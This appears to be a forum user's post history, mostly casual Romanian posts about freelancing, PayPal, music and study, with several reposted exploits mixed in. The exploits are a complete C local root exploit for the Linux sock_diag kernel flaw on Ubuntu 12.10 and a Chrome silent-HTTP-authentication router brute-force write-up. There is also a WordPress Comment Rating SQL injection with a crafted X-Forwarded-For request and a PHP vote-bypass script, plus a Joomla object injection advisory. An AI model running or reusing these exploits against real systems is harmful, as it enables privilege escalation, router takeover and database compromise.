-
Posts
1577 -
Joined
-
Last visited
-
Days Won
10
Everything posted by Gonzalez
-
Local root exploit for Ubuntu 12.10 64bit that leverages the sock_diag_handlers[] vulnerability in Linux kernels before 3.7.10. #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <netinet/tcp.h> #include <errno.h> #include <linux/if.h> #include <linux/filter.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <linux/sock_diag.h> #include <linux/inet_diag.h> #include <linux/unix_diag.h> #include <sys/mman.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; unsigned long sock_diag_handlers, nl_table; int __attribute__((regparm(3))) ) { commit_creds(prepare_kernel_cred(0)); return -1; } char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; int main() { int fd; unsigned long mmap_start, mmap_size = 0x10000; unsigned family; struct { struct nlmsghdr nlh; struct unix_diag_req r; } req; char buf[8192]; if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ printf("Can't create sock diag socket\n"); return -1; } memset(&req, 0, sizeof(req)); req.nlh.nlmsg_len = sizeof(req); req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; req.nlh.nlmsg_seq = 123456; req.r.udiag_states = -1; req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; /* Ubuntu 12.10 x86_64 */ req.r.sdiag_family = 0x37; commit_creds = (_commit_creds) 0xffffffff8107d180; prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410; mmap_start = 0x1a000; if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x; memset((void *)mmap_start, 0x90, mmap_size); memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1)); send(fd, &req, sizeof(req), 0); if(!getuid()) system("/bin/sh"); }
-
Prima data fa ceea ce iti place, nu invata programare doar ca e platit mai bine decat x. Fi un freelancer cu talentul tau. Programarea e cam grea pentru inceput, dar merita sa o stii, niciodata nu stii ce ocazie ti se iveste. Am multi prieteni programatori care acum traiesc in America. Au ajuns acolo cu ajutorul firmei la care lucrau. Daca nu sti sa faci nimic, i-au de la zero, citeste tutoriale si asa mai departe pana inveti un lucru, si perfectioneaza-l. Cand e vorba de clienti, fi sigur pe tine si livreaza proiectul 100%. Nu uita, fa ceea ce iti place. -Gonzalez
-
1. Code/Racer Made by the team at Treehouse, Code/Racer is an online racing game that forces you to learn to code quickly to get ahead on the race track. Beyond this racing game, Treehouse boasts more than 650 instructional videos; as you complete courses, earn badges for your accomplishments. 2. MIT OpenCourseWare MIT has opened all of its course content to web audiences, so anyone, anywhere can learn from one of the top American research institutions. Think about it: An MIT education without the student loans or cut-throat application? Not too shabby. 3. Udacity Udacity believes today's higher education system is broken. Education is no longer something that happens once in a lifetime, but rather is a lifelong experience. That's why it has ported loads of computer science, math and physics courses online. 4. Mozilla Developer Network The Mozilla Developer Network is a resource-rich collection of documents about web development, made for anyone, from expert programmers to students just starting out. MDN is a wiki, meaning anyone can edit its pages with corrections and updates. 5. The CodePlayer On The CodePlayer, watch interactive presentations that explain how people built things from scratch. Once you become a coding pro, you can add your own presentations to teach others what you know. 6. Coursera Online education giant Coursera brings courses from dozens of top universities online, and lets anyone take them for free. Coursera classes are now available in five languages, English, Spanish, French, Italian and Chinese, and are taught by professors from 62 universities. 7. Codeacademy Unlike some of these other online education platforms, Codeacademy focuses solely on teaching coding. You can choose from courses grouped into eight tracks: APIs, Ruby, Python, JavaScript, jQuery, PHP, web fundamentals, or combine languages into projects. 8. Khan Academy Khan Academy brings millions of students from around the world together to learn all sorts of digital skills, from coding to calculus to computer science theory. This means you can become an expert coder and an expert mathematician in the same place. 9. Learn Python the Hard Way Learn Python the Hard Way offers free PDFs, though, if you want to take the video version of the course, you'll need to fork up $29. What does learning the "Hard Way" mean? The number-one rule is that you can't copy-paste; you must type out each of the lessons in order to teach your hands the language. 10. HTML5 Rocks HTML5 Rocks is a one-stop guide to learning HTML5, written by tons of contributors who work for Google, Adobe and a bunch of other places. As an HTML5 Rocks student, you'll learn from slides, presentations and videos.
-
Asta nu stiu, nu ar fi normal sa scapi cu asa o suma, de exemplu $200-300, nu ar fi corect, cel putin dupa mine. Cred ca Paypal te va contacta sa platesti suma respectiva. E bine sa nu ai in "-" niciodata. Ti-am spus: daca ai in "-" cand vei primi bani in cont, acei bani vor inlocui suma in "-". Sfatul meu e sa nu ai niciodata bani in "-" in cont. -Gonzalez
-
Daca planuesti sa folosesti contul, atunci cand vei primi bani pe el, vor disparea -30$ din banii pe care i-ai primit, din pacate, am mai fost in situatia ta, si e naspa de tot. M-am invatat minte ca indienii nu au voie pe paypal, nu au acces; si nu mai fac afaceri cu ei + is persoane lenese si nesimtite. -Gonzalez
-
RSSOwl all the way. -Gonzalez
-
Trimite un PM sa vad site-ul te rog. Eu nu mai sunt in warez, si nu am timp sa te ajut. Vreau doar sa vad site-ul de curiozitate. -Gonzalez
-
Parazitii - In Jur.mp3 -Gonzalez
-
Test, test and test. -Gonzalez
-
FREDDIE GIBBS "Do Wrong pt. 2" OFFICIAL HQ MUSIC VIDEO -Gonzalez
-
# Exploit Title: [Google Chrome Silent HTTP Authentication] # Date: [2-5-2013] # Exploit Author: [T355] # Vendor Homepage: [http://www.google.com/chrome] # Version: [24.0.1312.57] # Tested on: [Tested on: Windows 7 & Mac OSX Mountain Lion] # CVE : [n/a] VULNERABILITY DETAILS The latest version of Google Chrome (Tested on Version 24.0.1312.57) fails to properly recognize HTTP Basic Authentication when injected in various HTML tags. As a result of this behavior Chrome will not alert the user when HTTP Basic Authentication is taking place or when credentials are rejected. This behavior is particularly concerning with respect to small office and home routers. Such devices are easily brute forced using this method. Many of these devices have the default password enabled which brings me to part II of this bug. Silent HTTP Authentication allows the attacker to log into the router and change settings with no alerts and or warnings issued by Chrome. The end result allows an attacker to brute force the router login, connect to the router, enable remote administration and of course control all information on the entire network via DNS attacks etc. REPRODUCTION CASE I have attached the following files: sploit.txt - Indicates the buggy code. jquery.js - Used for real world scenario but not needed for bug. brute.js - Real world attack scenario for this bug. index.html - HTML Attack Page attack.php - Payload file for Linksys Routers. VERSION Chrome Version: [24.0.1312.57] Operating System: [Tested on: Windows 7 & Mac OSX Mountain Lion] CREDIT T355 IMPACT The impact for this bug is enormous. Tens of millions of home routers can easily be completely compromised. Distributed brute force attacks can be performed on any HTTP Authentication portal. RECOMMENDATIONS Reference how Firefox and Safari handle the attached code. PoC: http://www.exploit-db.com/sploits/24486.tar.gz
-
Aveam nevoie de asta, mersi. -Gonzalez
-
http://www.publi24.ro/anunturi/animale/caini/bulldog-englez/ http://www.animalutul.ro/anunturi/caini/bulldog-englez/ http://www.canisapremium.ro/caini_bulldog-englez-de-vanzare_52/ -Gonzalez
-
La mine merge bine, se incarca repede. -Gonzalez
-
Mai bine te axezi pe .com, si faci un site interesant. Am vazut ca pe .ro nu sunt asa de multe site-uri cu traffic. -Gonzalez
-
Parazitii - Am Comis'o Din Nou.mp3 -Gonzalez
-
Parazitii - Am Comis'o Din Nou.mp3 -Gonzalez
-
# Exploit Title: Wordpress plugin: Comment Rating SQL injection # Google Dork: # Date: 21/02/2013 # Exploit Author: ebanyu # Url Author: www.ebanyu.com.ar # Vendor Homepage: wealthynetizen.com # Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/ # Version: 2.9.32 # Tested on: Fedora 18 + mysql 5.5 + php 5.4 Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php First take the IP from HTTP_X_FORWARDED_FOR header. ----------------------------------------------------------------------- 48 $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR"); 49 if(strstr($row['ck_ips'], $ip)) { 50 // die('error|You have already voted on this item!'); 51 // Just don't count duplicated votes 52 $duplicated = 1; 53 $ck_ips = $row['ck_ips']; 54 } Later made a UPDATE without filter the input. ------------------------------------------------------------------------ 77 $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id"; So let's take a look in the DB mysql> select * from wp_comment_rating; +---------------+----------------+--------------+----------------+ | ck_comment_id | ck_ips | ck_rating_up | ck_rating_down | +---------------+----------------+--------------+----------------+ | 2 | ,20.209.10.130 | 1 | 0 | | 3 | | 0 | 0 | +---------------+----------------+--------------+----------------+ 2 rows in set (0.00 sec) Now made a HTTP request with a injection in the HTTP_X_FORWARDED_FOR header: GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1 Host: 192.168.1.10 Accept-Encoding: gzip, deflate X-Forwarded-For: ', ck_ips=(select user()) WHERE ck_comment_id=2# Connection: keep-alive And the result is: mysql> select * from wp_comment_rating; +---------------+---------------------+--------------+----------------+ | ck_comment_id | ck_ips | ck_rating_up | ck_rating_down | +---------------+---------------------+--------------+----------------+ | 2 | wordpress@localhost | 2 | 0 | | 3 | | 0 | 0 | +---------------+---------------------+--------------+----------------+ 2 rows in set (0.00 sec) Cheers ======================================================================================= # Exploit Title: Wordpress plugin: Comment Rating Bypass vote limitation # Date: 21/02/2013 # Exploit Author: ebanyu # Url Author: www.ebanyu.com.ar # Vendor Homepage: wealthynetizen.com # Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/ # Version: 2.9.32 # Tested on: Fedora 18 + mysql 5.5 + php 5.4 Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php First take the IP from HTTP_X_FORWARDED_FOR header. ----------------------------------------------------------------------- 48 $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR"); 49 if(strstr($row['ck_ips'], $ip)) { 50 // die('error|You have already voted on this item!'); 51 // Just don't count duplicated votes 52 $duplicated = 1; 53 $ck_ips = $row['ck_ips']; 54 } Later made a UPDATE without filter the input. ------------------------------------------------------------------------ 77 $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id"; Now for bypass the vote limitation, we just have to add the HTTP_X_FORWARDED_FOR header and change it once per request. A simple POC is made in php. <?PHP define('HOST','http://localhost/wordpress/'); define('IDCOMMENT',2); $url=parse_url(HOST); define('URL',$url['path'].'wp-content/plugins/comment-rating/ck-processkarma.php?id='.IDCOMMENT.'&action=add&path=a&imgIndex=1_14_'); for($i=0;$i<1;$i++) lvlup(); function lvlup(){ global $url; $header = "GET ".URL." HTTP/1.1 \r\n"; $header.= "Host: ".$url['host']."\r\n"; $header.= "Accept-Encoding: gzip, deflate \r\n"; $header.= "X-Forwarded-For: ".long2ip(rand(0, "4294967295"))."\r\n"; $header.= "Connection: close \r\n\r\n"; $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); socket_connect($socket,$url['host'], 80); socket_write($socket, $header); socket_close($socket); } ?>
-
------------------------------------------------------------------- Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability ------------------------------------------------------------------- [-] Software Link: http://www.joomla.org/ [-] Affected Versions: Version 3.0.2 and earlier 3.0.x versions. Version 2.5.8 and earlier 2.5.x versions. [-] Vulnerability Description: The vulnerable code is located in /plugins/system/highlight/highlight.php: 56. // Get the terms to highlight from the request. 57. $terms = $input->request->get('highlight', null, 'base64'); 58. $terms = $terms ? unserialize(base64_decode($terms)) : null; User input passed through the "highlight" parameter is not properly sanitized before being used in an unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the application scope. Successful exploitation of this vulnerability doesn't require authentication, but requires the "System Highlight" plugin to be enabled (such as by default configuration). [-] Solution: Upgrade to version 3.0.3 or 2.5.9. [-] Disclosure Timeline: [31/10/2012] - Vendor notified [08/11/2012] - Vendor asked for a proof of concept [08/11/2012] - Proof of concept provided to the vendor [04/02/2013] - Vendor update released [27/02/2013] - Public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-1453 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2013-03
-
Tot la profilul ales de tine; in 2010 parca. -Gonzalez
-
Tot la VIA, dar trebuia sa dau parca 2 examene, unul din matematica si altul nu mai stiu din ce. -Gonzalez
-
Imi trebuia matematica, pe care eu nu o stiam, si alte studii. Trebuia sa dau examen de intrare. Am auzit ca e pe gratis sau cu taxa mica parca. -Gonzalez
-
Salut, Am aplicat si eu la universitate, dar m-am retras in ultima clipa. Am vazut niste clipuri pe youtube, sunt si romani pe acolo. Multa Bafta. -Gonzalez
-
Dupa mine, is prea increzuti. Nu-mi place de ei. -Gonzalez